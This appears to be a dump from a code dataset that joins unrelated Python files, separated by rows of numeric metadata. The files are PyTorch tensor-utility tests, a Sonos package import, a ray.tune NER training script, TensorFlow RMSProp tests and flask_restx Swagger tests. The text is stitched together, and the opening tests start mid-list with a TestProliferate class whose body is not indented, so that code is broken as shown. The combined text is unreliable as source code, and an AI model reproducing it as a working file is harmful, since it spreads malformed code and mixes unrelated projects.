        (self.batch, self.triuWithoutDiagonalRes),
        (self.batchRectangleShapeA, self.triuWithoutDiagonalResRecShapeA),
        (self.batchRectangleShapeB, self.triuWithoutDiagonalResRecShapeB),
    ]
    for source, expected in cases:
        res = batch_triu_set(source, 0.0, False)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
    # the inputs must be left untouched (out-of-place by default)
    self.assertTrue(torch.equal(self.batch, self.batchClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
    self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_triu_set_without_diagonal_in_place(self):
    """In-place batch_triu_set without diagonal must return and mutate the argument."""
    cases = [
        (self.batch, self.triuWithoutDiagonalRes),
        (self.batchRectangleShapeA, self.triuWithoutDiagonalResRecShapeA),
        (self.batchRectangleShapeB, self.triuWithoutDiagonalResRecShapeB),
    ]
    for source, expected in cases:
        work = source.clone()
        res = batch_triu_set(work, 0.0, False, True)
        self.assertTrue(torch.equal(res, expected),
                        msg="Difference:\n{}".format(expected - res))
        # in-place mode must also modify the argument itself
        self.assertTrue(torch.equal(work, expected),
                        msg="Difference:\n{}".format(expected - work))
def test_span_mask(self):
    """Unit test of the span mask util: valid spans plus invalid-argument cases."""
    expectations = [
        ((4, 3), [[0, 0], [0, 1], [0, 2], [1, 1], [1, 2], [1, 3], [2, 2], [2, 3], [3, 3]]),
        ((3, 1), [[0, 0], [1, 1], [2, 2]]),
        # a max span longer than the sequence is clipped to the sequence length
        ((3, 4), [[0, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 2]]),
    ]
    for args, spans in expectations:
        res = span_mask(*args)
        self.assertTrue(torch.equal(res, torch.tensor(spans)), msg=str(res))
    # zero-sized arguments are rejected
    for bad_args in ((0, 1), (1, 0), (0, 0)):
        with self.assertRaises(AssertionError):
            span_mask(*bad_args)
class TestProliferate(unittest.TestCase):
"""
Test of the proliferate method.
"""
def test_proliferate(self):
    """Base unit test of proliferate: each row is repeated the requested number of times."""
    identity = torch.tensor([[1, 0], [0, 1]])
    # multiplier 1 leaves the tensor unchanged
    self.assertTrue(torch.equal(proliferate(identity, 1),
                                torch.tensor([[1, 0], [0, 1]])))
    # non-positive multipliers are rejected
    with self.assertRaises(AssertionError):
        self.assertTrue(torch.equal(proliferate(identity, 0),
                                    torch.tensor([], dtype=torch.long)))
    with self.assertRaises(AssertionError):
        proliferate(identity, -1)
    # each row repeated four times, block-wise
    self.assertTrue(torch.equal(
        proliferate(identity, 4),
        torch.tensor([[1, 0]] * 4 + [[0, 1]] * 4)
    ))
    # three rows, each repeated three times
    self.assertTrue(torch.equal(
        proliferate(torch.tensor([[1, 3], [0, 0], [0, 1]]), 3),
        torch.tensor([[1, 3]] * 3 + [[0, 0]] * 3 + [[0, 1]] * 3)
    ))
def test_proliferate_multi_dim(self):
    """Proliferate must also repeat elements that are themselves matrices."""
    source = torch.tensor([[[1, 0], [2, 0]], [[0, 1], [1, 1]]])
    expected = torch.tensor([[[1, 0], [2, 0]]] * 4 + [[[0, 1], [1, 1]]] * 4)
    self.assertTrue(torch.equal(proliferate(source, 4), expected))
def test_proliferate_single(self):
    """Proliferate must repeat scalar elements of a 1-D tensor in place order."""
    self.assertTrue(torch.equal(
        proliferate(torch.tensor([1, 0, 3]), 3),
        torch.tensor([1, 1, 1, 0, 0, 0, 3, 3, 3])
    ))
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 38.938492
| 118
| 0.516076
| 2,036
| 19,625
| 4.894401
| 0.062377
| 0.034922
| 0.022579
| 0.13728
| 0.872955
| 0.867938
| 0.850978
| 0.798495
| 0.730256
| 0.666633
| 0
| 0.05108
| 0.35358
| 19,625
| 503
| 119
| 39.015905
| 0.734432
| 0.079745
| 0
| 0.472727
| 0
| 0
| 0.030941
| 0
| 0
| 0
| 0
| 0
| 0.161039
| 1
| 0.033766
| false
| 0
| 0.007792
| 0
| 0.046753
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
07db98a90df4856f178dd4bc0f8420ae904d6746
| 25
|
py
|
Python
|
__init__.py
|
juergenpabel/kalliope_neuron_sonos
|
de07206f2f2969e186c3f4c37761f378bdb11b91
|
[
"MIT"
] | null | null | null |
__init__.py
|
juergenpabel/kalliope_neuron_sonos
|
de07206f2f2969e186c3f4c37761f378bdb11b91
|
[
"MIT"
] | null | null | null |
__init__.py
|
juergenpabel/kalliope_neuron_sonos
|
de07206f2f2969e186c3f4c37761f378bdb11b91
|
[
"MIT"
] | null | null | null |
from .sonos import Sonos
| 12.5
| 24
| 0.8
| 4
| 25
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
07e996b6f692d272ce58d05821769a0a6550ff24
| 21,081
|
py
|
Python
|
train-template.py
|
Fangyh09/s_t
|
72bc9f7abfe937f46b7175c39d23acb914f6293d
|
[
"Apache-2.0"
] | null | null | null |
train-template.py
|
Fangyh09/s_t
|
72bc9f7abfe937f46b7175c39d23acb914f6293d
|
[
"Apache-2.0"
] | null | null | null |
train-template.py
|
Fangyh09/s_t
|
72bc9f7abfe937f46b7175c39d23acb914f6293d
|
[
"Apache-2.0"
] | null | null | null |
from model.data_utils import CoNLLDataset
from model.ner_model import NERModel
from config import Config
from tensorflow.python import debug as tf_debug
import tensorflow as tf
import ray
import ray.tune as tune
def main2():
    """Train a NER model once with the default configuration (no tuning)."""
    cfg = Config()

    ner = NERModel(cfg)
    ner.build()
    # ner.restore_session("results/crf/model.weights/")  # optional: resume from saved weights
    # ner.reinitialize_weights("proj")

    # load the evaluation and training datasets described by the config
    dev_set = CoNLLDataset(cfg.filename_dev, cfg.processing_word,
                           cfg.processing_tag, cfg.max_iter)
    train_set = CoNLLDataset(cfg.filename_train, cfg.processing_word,
                             cfg.processing_tag, cfg.max_iter)

    ner.train(train_set, dev_set)
def main():
    """Run a ray.tune hyper-parameter experiment for the NER model.

    The datasets are loaded once with the default configuration and closed
    over by the per-trial training function, so every trial shares them.

    NOTE(review): the original file carried ~450 lines of commented-out
    experiment definitions (exp-go1 … exp-final-epoch30); they were dead
    code and have been removed. Only the active experiment below remains.
    """
    default_config = Config()
    dev = CoNLLDataset(default_config.filename_dev, default_config.processing_word,
                       default_config.processing_tag, default_config.max_iter)
    train = CoNLLDataset(default_config.filename_train, default_config.processing_word,
                         default_config.processing_tag, default_config.max_iter)

    def train_func(_config, reporter):
        """Single tune trial: build a fresh model from the sampled config and train it."""
        config = Config()
        for key, val in _config.items():
            # config keys carry a two-digit ordering prefix (e.g. "21-lr_method");
            # strip the leading "NN-" to recover the real Config attribute name
            setattr(config, key[3:], val)
        setattr(config, "dir_output", "")
        setattr(config, "nepochs", 50)
        model = NERModel(config)
        model.build()
        model.train(train, dev, reporter)

    # ray.init(redis_address="192.168.1.201:20198")  # remote-cluster alternative
    ray.init(num_cpus=1, num_gpus=2)
    tune.register_trainable("train_func_final", train_func)

    tune.run_experiments({
        "exp-final-epoch30-sgd": {
            "run": "train_func_final",
            "stop": {"mean_accuracy": 99},
            "local_dir": "./ray_results/06-17",
            "trial_resources": {'cpu': 0, 'gpu': 1},
            "config": {
                "17-lstm_layers": 2,
                "19-clip": 5,
                "21-lr_method": "sgd",
                "23-lr_decay": 0.9,
                "25-lr": 0.015,
                "27-decay_mode": "none",
            },
        },
    })
if __name__ == "__main__":
main()
| 40.077947
| 89
| 0.415635
| 2,261
| 21,081
| 3.657674
| 0.080495
| 0.092866
| 0.162515
| 0.068924
| 0.859492
| 0.84994
| 0.839299
| 0.829504
| 0.820556
| 0.816324
| 0
| 0.09861
| 0.392439
| 21,081
| 525
| 90
| 40.154286
| 0.54708
| 0.680755
| 0
| 0.196078
| 0
| 0
| 0.036603
| 0.003462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.137255
| 0
| 0.196078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed247929e7966abd23d3edf8e889759219a4ac74
| 8,471
|
py
|
Python
|
tensorflow/python/training/rmsprop_test.py
|
ln0119/tensorflow-fast-rcnn
|
e937e6394818c9a320754237651d7fe083b1020d
|
[
"Apache-2.0"
] | 73
|
2017-01-05T09:06:08.000Z
|
2021-11-06T14:00:50.000Z
|
tensorflow/python/training/rmsprop_test.py
|
minhhoai2/tensorflow
|
da88903d5e29230d68d861053aa1dea1432c0696
|
[
"Apache-2.0"
] | 8
|
2017-04-10T10:36:20.000Z
|
2021-02-07T01:02:32.000Z
|
tensorflow/python/training/rmsprop_test.py
|
minhhoai2/tensorflow
|
da88903d5e29230d68d861053aa1dea1432c0696
|
[
"Apache-2.0"
] | 151
|
2016-11-10T09:01:15.000Z
|
2022-01-18T08:13:49.000Z
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rmsprop."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
import tensorflow as tf
class RMSPropOptimizerTest(tf.test.TestCase):
  """Numerical regression tests for tf.train.RMSPropOptimizer.

  Expected values are hand-computed from the RMSProp update rule with
  learning_rate=2.0 and decay=0.9:

      rms <- decay * rms + (1 - decay) * grad**2
      mom <- momentum * mom + lr * grad / sqrt(rms + epsilon)
      var <- var - mom

  The rms slot starts at 1.0, so after one step with grad=0.1 it is
  0.9*1.0 + 0.1*0.01 = 0.901 (and 0.90001 for grad=0.01) — these constants
  recur throughout the assertions below.

  NOTE(review): this file uses TF1-era APIs (self.test_session(),
  tf.initialize_all_variables(), var.eval()); it predates their deprecation.
  """

  def testWithoutMomentum(self):
    """Two RMSProp steps with momentum=0.0 for both half and float32.

    With momentum disabled each step reduces to
    var -= lr * grad / sqrt(rms + epsilon); the momentum slots still exist
    but stay zero.
    """
    for dtype in [tf.half, tf.float32]:
      with self.test_session():
        var0 = tf.Variable([1.0, 2.0], dtype=dtype)
        var1 = tf.Variable([3.0, 4.0], dtype=dtype)
        grads0 = tf.constant([0.1, 0.1], dtype=dtype)
        grads1 = tf.constant([0.01, 0.01], dtype=dtype)
        # epsilon=1.0 (unusually large) keeps sqrt(rms + eps) well-conditioned
        # so the half-precision run stays within assertAllCloseAccordingToType
        # tolerances.
        opt = tf.train.RMSPropOptimizer(learning_rate=2.0, decay=0.9,
                                        momentum=0.0, epsilon=1.0)
        update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
        tf.initialize_all_variables().run()
        # The optimizer must have created "rms" and "momentum" slots for
        # every trained variable.
        rms0 = opt.get_slot(var0, "rms")
        self.assertTrue(rms0 is not None)
        rms1 = opt.get_slot(var1, "rms")
        self.assertTrue(rms1 is not None)
        mom0 = opt.get_slot(var0, "momentum")
        self.assertTrue(mom0 is not None)
        mom1 = opt.get_slot(var1, "momentum")
        self.assertTrue(mom1 is not None)
        # Fetch params to validate initial values
        self.assertAllClose([1.0, 2.0], var0.eval())
        self.assertAllClose([3.0, 4.0], var1.eval())
        # Step 1: the rms accumulators were 1. So we should see a normal
        # update: v -= grad * learning_rate
        update.run()
        # Check the root mean square accumulators.
        self.assertAllCloseAccordingToType(np.array([0.901, 0.901]),
                                           rms0.eval())
        self.assertAllCloseAccordingToType(np.array([0.90001, 0.90001]),
                                           rms1.eval())
        # Check the parameters: var -= lr * grad / sqrt(rms + epsilon).
        self.assertAllCloseAccordingToType(
            np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0)),
                      2.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0))]),
            var0.eval())
        self.assertAllCloseAccordingToType(
            np.array([3.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0)),
                      4.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0))]),
            var1.eval())
        # Step 2: the root mean square accumulators contain the previous update.
        update.run()
        # Check the rms accumulators (decayed step-1 value + (1-decay)*grad^2).
        self.assertAllCloseAccordingToType(
            np.array([0.901*0.9+0.001, 0.901*0.9+0.001]), rms0.eval())
        self.assertAllCloseAccordingToType(
            np.array([0.90001*0.9+1e-5, 0.90001*0.9+1e-5]),
            rms1.eval())
        # Check the parameters: cumulative effect of both steps.
        self.assertAllCloseAccordingToType(
            np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0))
                      - (0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1.0)),
                      2.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0))
                      - (0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1.0))]),
            var0.eval())
        self.assertAllCloseAccordingToType(
            np.array([3.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0))
                      - (0.01 * 2.0 / math.sqrt(0.90001*0.9+1e-5+1.0)),
                      4.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0))
                      - (0.01 * 2.0 / math.sqrt(0.90001*0.9+1e-5+1.0))]),
            var1.eval())

  def testWithMomentum(self):
    """Two RMSProp steps with momentum=0.5 for both half and float32.

    The momentum slot accumulates mom <- 0.5*mom + lr*grad/sqrt(rms+eps)
    and the variable moves by the full mom value each step.
    """
    for dtype in [tf.half, tf.float32]:
      with self.test_session():
        var0 = tf.Variable([1.0, 2.0], dtype=dtype)
        var1 = tf.Variable([3.0, 4.0], dtype=dtype)
        grads0 = tf.constant([0.1, 0.1], dtype=dtype)
        grads1 = tf.constant([0.01, 0.01], dtype=dtype)
        opt = tf.train.RMSPropOptimizer(learning_rate=2.0, decay=0.9,
                                        momentum=0.5, epsilon=1e-5)
        update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
        tf.initialize_all_variables().run()
        rms0 = opt.get_slot(var0, "rms")
        self.assertTrue(rms0 is not None)
        rms1 = opt.get_slot(var1, "rms")
        self.assertTrue(rms1 is not None)
        mom0 = opt.get_slot(var0, "momentum")
        self.assertTrue(mom0 is not None)
        mom1 = opt.get_slot(var1, "momentum")
        self.assertTrue(mom1 is not None)
        # Fetch params to validate initial values
        self.assertAllClose([1.0, 2.0], var0.eval())
        self.assertAllClose([3.0, 4.0], var1.eval())
        # Step 1: rms = 1, mom = 0. So we should see a normal
        # update: v -= grad * learning_rate
        update.run()
        # Check the root mean square accumulators.
        self.assertAllCloseAccordingToType(np.array([0.901, 0.901]),
                                           rms0.eval())
        self.assertAllCloseAccordingToType(np.array([0.90001, 0.90001]),
                                           rms1.eval())
        # Check the momentum accumulators: with mom initially 0 the slot
        # simply holds lr * grad / sqrt(rms + epsilon).
        self.assertAllCloseAccordingToType(
            np.array([(0.1 * 2.0 / math.sqrt(0.901+1e-5)),
                      (0.1 * 2.0 / math.sqrt(0.901+1e-5))]),
            mom0.eval())
        self.assertAllCloseAccordingToType(
            np.array([(0.01 * 2.0/ math.sqrt(0.90001+1e-5)),
                      (0.01 * 2.0/ math.sqrt(0.90001+1e-5))]),
            mom1.eval())
        # Check that the parameters moved by exactly the momentum value.
        self.assertAllCloseAccordingToType(
            np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5)),
                      2.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5))]),
            var0.eval())
        self.assertAllCloseAccordingToType(
            np.array([3.0 - (0.01 * 2.0/ math.sqrt(0.90001+1e-5)),
                      4.0 - (0.01 * 2.0/ math.sqrt(0.90001+1e-5))]),
            var1.eval())
        # Step 2: the root mean square accumulators contain the previous update.
        update.run()
        # Check the rms accumulators.
        self.assertAllCloseAccordingToType(
            np.array([0.901*0.9+0.001, 0.901*0.9+0.001]),
            rms0.eval())
        self.assertAllCloseAccordingToType(
            np.array([0.90001*0.9+1e-5, 0.90001*0.9+1e-5]),
            rms1.eval())
        # Momentum now carries half of the step-1 value plus the fresh term.
        self.assertAllCloseAccordingToType(
            np.array([0.5 * (0.1 * 2.0 / math.sqrt(0.901+1e-5)) +
                      (0.1*2.0/math.sqrt(0.901*0.9+0.001+1e-5)),
                      0.5 * (0.1 * 2.0 / math.sqrt(0.901+1e-5)) +
                      (0.1*2.0/math.sqrt(0.901*0.9+0.001+1e-5))]),
            mom0.eval())
        # 2e-5 below is (1-decay)*grad^2 + epsilon = 1e-5 + 1e-5 folded together.
        self.assertAllCloseAccordingToType(
            np.array([0.5 * (0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
                      (0.01 * 2.0 /math.sqrt(0.90001*0.9+2e-5)),
                      0.5 * (0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
                      (0.01 * 2.0 / math.sqrt(0.90001*0.9+2e-5))]),
            mom1.eval())
        # Check the parameters: initial value minus both momentum payouts.
        self.assertAllCloseAccordingToType(
            np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5)) - (0.5 * (
                0.1 * 2.0 / math.sqrt(0.901+1e-5)) +(
                0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1e-5))),
                      2.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5)) - (0.5 * (
                0.1 * 2.0 / math.sqrt(0.901+1e-5)) +(
                0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1e-5)))
                      ]), var0.eval())
        self.assertAllCloseAccordingToType(
            np.array([3.0 - (0.01 * 2.0 / math.sqrt(0.90001+1e-5))
                      - (0.5 *(0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
                      (0.01 * 2.0 /math.sqrt(0.90001*0.9+2e-5))),
                      4.0 - (0.01 * 2.0 / math.sqrt(0.90001+1e-5))
                      - (0.5 *(0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
                      (0.01 * 2.0 / math.sqrt(0.90001*0.9+2e-5)))]),
            var1.eval())
# Standard TensorFlow test entry point: discovers and runs the cases above.
if __name__ == "__main__":
  tf.test.main()
| 44.820106
| 80
| 0.523551
| 1,207
| 8,471
| 3.639602
| 0.135874
| 0.023674
| 0.054632
| 0.091054
| 0.818803
| 0.818803
| 0.806966
| 0.806966
| 0.79786
| 0.776007
| 0
| 0.142246
| 0.310353
| 8,471
| 188
| 81
| 45.058511
| 0.609723
| 0.157833
| 0
| 0.623188
| 0
| 0
| 0.007326
| 0
| 0
| 0
| 0
| 0
| 0.231884
| 1
| 0.014493
| false
| 0
| 0.043478
| 0
| 0.065217
| 0.007246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed42e638f862cac83e40b7017b61c738b23a506d
| 105,347
|
py
|
Python
|
tests/test_swagger.py
|
james-powis/flask-restx
|
ee1fc4ceb93887065b4785f14dadd70d7bc2efe7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_swagger.py
|
james-powis/flask-restx
|
ee1fc4ceb93887065b4785f14dadd70d7bc2efe7
|
[
"BSD-3-Clause"
] | 1
|
2020-02-12T11:22:16.000Z
|
2020-02-12T11:22:16.000Z
|
tests/test_swagger.py
|
james-powis/flask-restx
|
ee1fc4ceb93887065b4785f14dadd70d7bc2efe7
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pytest
from textwrap import dedent
from flask import url_for, Blueprint
from werkzeug.datastructures import FileStorage
import flask_restx as restx
from flask_restx import inputs
class SwaggerTest(object):
def test_specs_endpoint(self, api, client):
data = client.get_specs("")
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["consumes"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
@pytest.mark.api(prefix="/api")
def test_specs_endpoint_with_prefix(self, api, client):
data = client.get_specs("/api")
assert data["swagger"] == "2.0"
assert data["basePath"] == "/api"
assert data["produces"] == ["application/json"]
assert data["consumes"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
def test_specs_endpoint_produces(self, api, client):
def output_xml(data, code, headers=None):
pass
api.representations["application/xml"] = output_xml
data = client.get_specs()
assert len(data["produces"]) == 2
assert "application/json" in data["produces"]
assert "application/xml" in data["produces"]
def test_specs_endpoint_info(self, app, client):
api = restx.Api(
version="1.0",
title="My API",
description="This is a testing API",
terms_url="http://somewhere.com/terms/",
contact="Support",
contact_url="http://support.somewhere.com",
contact_email="contact@somewhere.com",
license="Apache 2.0",
license_url="http://www.apache.org/licenses/LICENSE-2.0.html",
)
api.init_app(app)
data = client.get_specs()
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
assert data["info"]["title"] == "My API"
assert data["info"]["version"] == "1.0"
assert data["info"]["description"] == "This is a testing API"
assert data["info"]["termsOfService"] == "http://somewhere.com/terms/"
assert data["info"]["contact"] == {
"name": "Support",
"url": "http://support.somewhere.com",
"email": "contact@somewhere.com",
}
assert data["info"]["license"] == {
"name": "Apache 2.0",
"url": "http://www.apache.org/licenses/LICENSE-2.0.html",
}
def test_specs_endpoint_info_delayed(self, app, client):
api = restx.Api(version="1.0")
api.init_app(
app,
title="My API",
description="This is a testing API",
terms_url="http://somewhere.com/terms/",
contact="Support",
contact_url="http://support.somewhere.com",
contact_email="contact@somewhere.com",
license="Apache 2.0",
license_url="http://www.apache.org/licenses/LICENSE-2.0.html",
)
data = client.get_specs()
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
assert data["info"]["title"] == "My API"
assert data["info"]["version"] == "1.0"
assert data["info"]["description"] == "This is a testing API"
assert data["info"]["termsOfService"] == "http://somewhere.com/terms/"
assert data["info"]["contact"] == {
"name": "Support",
"url": "http://support.somewhere.com",
"email": "contact@somewhere.com",
}
assert data["info"]["license"] == {
"name": "Apache 2.0",
"url": "http://www.apache.org/licenses/LICENSE-2.0.html",
}
def test_specs_endpoint_info_callable(self, app, client):
api = restx.Api(
version=lambda: "1.0",
title=lambda: "My API",
description=lambda: "This is a testing API",
terms_url=lambda: "http://somewhere.com/terms/",
contact=lambda: "Support",
contact_url=lambda: "http://support.somewhere.com",
contact_email=lambda: "contact@somewhere.com",
license=lambda: "Apache 2.0",
license_url=lambda: "http://www.apache.org/licenses/LICENSE-2.0.html",
)
api.init_app(app)
data = client.get_specs()
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
assert data["info"]["title"] == "My API"
assert data["info"]["version"] == "1.0"
assert data["info"]["description"] == "This is a testing API"
assert data["info"]["termsOfService"] == "http://somewhere.com/terms/"
assert data["info"]["contact"] == {
"name": "Support",
"url": "http://support.somewhere.com",
"email": "contact@somewhere.com",
}
assert data["info"]["license"] == {
"name": "Apache 2.0",
"url": "http://www.apache.org/licenses/LICENSE-2.0.html",
}
def test_specs_endpoint_no_host(self, app, client):
restx.Api(app)
data = client.get_specs("")
assert "host" not in data
assert data["basePath"] == "/"
@pytest.mark.options(server_name="api.restx.org")
def test_specs_endpoint_host(self, app, client):
# app.config['SERVER_NAME'] = 'api.restx.org'
restx.Api(app)
data = client.get_specs("")
assert data["host"] == "api.restx.org"
assert data["basePath"] == "/"
@pytest.mark.options(server_name="api.restx.org")
def test_specs_endpoint_host_with_url_prefix(self, app, client):
blueprint = Blueprint("api", __name__, url_prefix="/api/1")
restx.Api(blueprint)
app.register_blueprint(blueprint)
data = client.get_specs("/api/1")
assert data["host"] == "api.restx.org"
assert data["basePath"] == "/api/1"
@pytest.mark.options(server_name="restx.org")
def test_specs_endpoint_host_and_subdomain(self, app, client):
blueprint = Blueprint("api", __name__, subdomain="api")
restx.Api(blueprint)
app.register_blueprint(blueprint)
data = client.get_specs(base_url="http://api.restx.org")
assert data["host"] == "api.restx.org"
assert data["basePath"] == "/"
def test_specs_endpoint_tags_short(self, app, client):
restx.Api(app, tags=["tag-1", "tag-2", "tag-3"])
data = client.get_specs("")
assert data["tags"] == [{"name": "tag-1"}, {"name": "tag-2"}, {"name": "tag-3"}]
def test_specs_endpoint_tags_tuple(self, app, client):
restx.Api(
app, tags=[("tag-1", "Tag 1"), ("tag-2", "Tag 2"), ("tag-3", "Tag 3"),]
)
data = client.get_specs("")
assert data["tags"] == [
{"name": "tag-1", "description": "Tag 1"},
{"name": "tag-2", "description": "Tag 2"},
{"name": "tag-3", "description": "Tag 3"},
]
def test_specs_endpoint_tags_dict(self, app, client):
restx.Api(
app,
tags=[
{"name": "tag-1", "description": "Tag 1"},
{"name": "tag-2", "description": "Tag 2"},
{"name": "tag-3", "description": "Tag 3"},
],
)
data = client.get_specs("")
assert data["tags"] == [
{"name": "tag-1", "description": "Tag 1"},
{"name": "tag-2", "description": "Tag 2"},
{"name": "tag-3", "description": "Tag 3"},
]
@pytest.mark.api(tags=["ns", "tag"])
def test_specs_endpoint_tags_namespaces(self, api, client):
api.namespace("ns", "Description")
data = client.get_specs("")
assert data["tags"] == [{"name": "ns"}, {"name": "tag"}]
def test_specs_endpoint_invalid_tags(self, app, client):
api = restx.Api(app, tags=[{"description": "Tag 1"}])
client.get_specs("", status=500)
assert list(api.__schema__.keys()) == ["error"]
    # NOTE(review): name and body look swapped with the next test — no
    # resource is registered here despite the "with_resources" name.
    # Renaming must be done together with the sibling test; confirm intent.
    def test_specs_endpoint_default_ns_with_resources(self, app, client):
        restx.Api(app)
        data = client.get_specs("")
        # With no resources registered, the default namespace emits no tag.
        assert data["tags"] == []
    # NOTE(review): despite the "without_resources" name this registers a
    # resource — looks swapped with the previous test; renaming must be done
    # together with the sibling test. Confirm intent.
    def test_specs_endpoint_default_ns_without_resources(self, app, client):
        api = restx.Api(app)

        @api.route("/test", endpoint="test")
        class TestResource(restx.Resource):
            def get(self):
                return {}

        data = client.get_specs("")
        # A resource in the default namespace surfaces the "default" tag.
        assert data["tags"] == [{"name": "default", "description": "Default namespace"}]
def test_specs_endpoint_default_ns_with_specified_ns(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns", "Test namespace")
@ns.route("/test2", endpoint="test2")
@api.route("/test", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == [
{"name": "default", "description": "Default namespace"},
{"name": "ns", "description": "Test namespace"},
]
def test_specs_endpoint_specified_ns_without_default_ns(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test2")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == [{"name": "ns", "description": "Test namespace"}]
def test_specs_endpoint_namespace_without_description(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns")
@ns.route("/test", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == [{"name": "ns"}]
def test_specs_endpoint_namespace_all_resources_hidden(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns")
@ns.route("/test", endpoint="test", doc=False)
class TestResource(restx.Resource):
def get(self):
return {}
@ns.route("/test2", endpoint="test2")
@ns.hide
class TestResource2(restx.Resource):
def get(self):
return {}
@ns.route("/test3", endpoint="test3")
@ns.doc(False)
class TestResource3(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == []
def test_specs_authorizations(self, app, client):
authorizations = {"apikey": {"type": "apiKey", "in": "header", "name": "X-API"}}
restx.Api(app, authorizations=authorizations)
data = client.get_specs()
assert "securityDefinitions" in data
assert data["securityDefinitions"] == authorizations
@pytest.mark.api(prefix="/api")
def test_minimal_documentation(self, api, client):
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("/api")
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/ns/" in paths
assert "get" in paths["/ns/"]
op = paths["/ns/"]["get"]
assert op["tags"] == ["ns"]
assert op["operationId"] == "get_test_resource"
assert "parameters" not in op
assert "summary" not in op
assert "description" not in op
assert op["responses"] == {"200": {"description": "Success",}}
assert url_for("api.test") == "/api/ns/"
@pytest.mark.api(prefix="/api", version="1.0")
def test_default_ns_resource_documentation(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
